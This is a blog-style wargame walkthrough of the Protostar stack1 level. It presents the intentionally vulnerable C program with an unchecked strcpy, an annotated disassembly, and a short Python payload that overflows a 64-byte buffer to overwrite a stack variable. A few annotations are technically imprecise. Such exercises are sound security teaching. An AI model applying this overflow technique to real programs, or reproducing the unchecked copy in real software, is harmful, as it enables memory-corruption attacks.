Binary Exploitation Protostar Stack1 - Walkthrough -Writeup

Posted by Suraj Singh on April 07, 2018 · 8 mins read
Hello Guyz,




In This Post, I am going to show you how we can win protostar stack1 level and in today's tutorial, our main focus will be on variable overwriting. we are going to learn a simple concept/technique that can overwrite the values of any variable Onto Stack during running state.

Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.


Source Code :

 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];

if(argc == 1) {
errx(1, "please specify an argument\n");
}

modified = 0;
strcpy(buffer, argv[1]);

if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}




Hint Provided By Exploit-Exercise.

This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

This level is at /opt/protostar/bin/stack1

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your readers.
Protostar is little endian

Solution:

Simply We Just Need To Overwrite the value of modified variable located Onto the Stack.
Before Start, Let's Try To Understand Situation Onto The Stack


0                        28                                                      92        96
============================================================================================
Other Things | Injectable Area | modified |
============================================================================================


Disassembly Of Codes

   0x08048464 <+0>: push   ebp
0x08048465 <+1>: mov ebp,esp
0x08048467 <+3>: and esp,0xfffffff0
0x0804846a <+6>: sub esp,0x60 << ====== 96 Bits Buffer Created
0x0804846d <+9>: cmp DWORD PTR [ebp+0x8],0x1 << ====== Comparing Args Variable with 1
0x08048471 <+13>: jne 0x8048487 <main+35> << ====== Jump Condition
0x08048473 <+15>: mov DWORD PTR [esp+0x4],0x80485a0
0x0804847b <+23>: mov DWORD PTR [esp],0x1
0x08048482 <+30>: call 0x8048388 <errx@plt>
0x08048487 <+35>: mov DWORD PTR [esp+0x5c],0x0 << ===== Variable Value [modified variable]
0x0804848f <+43>: mov eax,DWORD PTR [ebp+0xc] << ===== BUffer Starting Address To Insert String Through Strcpy
0x08048492 <+46>: add eax,0x4 << ===== Add 4 To EAX
0x08048495 <+49>: mov eax,DWORD PTR [eax] << ===== Loading Data From EAX mapped
0x08048497 <+51>: mov DWORD PTR [esp+0x4],eax << ===== Storing Current EAX Value Into Stack
0x0804849b <+55>: lea eax,[esp+0x1c] << ===== Starting POint Address To Insert Data Into Stack Buffer
0x0804849f <+59>: mov DWORD PTR [esp],eax
0x080484a2 <+62>: call 0x8048368 <strcpy@plt>
0x080484a7 <+67>: mov eax,DWORD PTR [esp+0x5c]
0x080484ab <+71>: cmp eax,0x61626364
0x080484b0 <+76>: jne 0x80484c0 <main+92>
0x080484b2 <+78>: mov DWORD PTR [esp],0x80485bc
0x080484b9 <+85>: call 0x8048398 <puts@plt>
0x080484be <+90>: jmp 0x80484d5 <main+113>
0x080484c0 <+92>: mov edx,DWORD PTR [esp+0x5c]
0x080484c4 <+96>: mov eax,0x80485f3
0x080484c9 <+101>: mov DWORD PTR [esp+0x4],edx
0x080484cd <+105>: mov DWORD PTR [esp],eax
0x080484d0 <+108>: call 0x8048378 <printf@plt>
0x080484d5 <+113>: leave
0x080484d6 <+114>: ret



Exploit

 1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/python
# -*- coding:utf-8 -*-
import struct

# Usages : ./bin/stack1 $(cat tmp)

payload = "a"*64
payload+= struct.pack("I", 0x61626364)


print payload



Very Easy! Hahaha.


For More Detailed Walk through Check Below Provided YouTube Video Playlist

Bitforestinfo YouTube Protostar CTF Playlist